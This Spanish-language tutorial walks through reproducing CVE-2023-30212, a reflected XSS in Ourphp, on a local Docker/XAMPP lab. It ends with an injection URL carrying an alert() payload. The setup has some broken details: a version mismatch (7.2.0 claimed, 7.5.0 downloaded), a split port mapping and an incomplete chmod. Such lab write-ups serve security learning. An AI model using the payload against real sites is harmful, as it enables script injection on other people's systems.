
Guía paso a paso para explotar CVE-2023-30212, una vulnerabilidad XSS en Ourphp 7.2.0, con configuración de Docker y demostración de inyección de payload.
Explotando vulnerabilidad en Ourphp versión 7.2.0 también conocido como CVE 2023 30212
Step 1. Descargar e instalar Docker en tu sistema (Nota). Estoy usando Docker porque es rápido y fácil instalar ubuntu.
Step 2. Configurar entorno Docker
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
Step 3. Instalar servidor web, php y mysql. Instalaré el servidor xampp para esto.
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
Step 4. Descargar Ourphp versión 7.2.0
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
Step 5. Configurar Ourphp en el navegador Abre tu navegador e ingresa localhost o 127.0.0.1 Sigue las instrucciones e instala Ourphp.
Step 6. Explotando la vulnerabilidad Ourphp versión 7.2.0 tiene una vulnerabilidad XSS (Cross-Site Scripting). Para mitigar la vulnerabilidad en el archivo /client/manage/ourphp_out.php que permite la ejecución de código XSS,
necesitas modificar el código. La vulnerabilidad surge cuando el parámetro "ourphp_admin" se establece en "logout" y se imprime la variable controlable "out".
Los atacantes pueden explotar esto inyectando un payload como "".
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
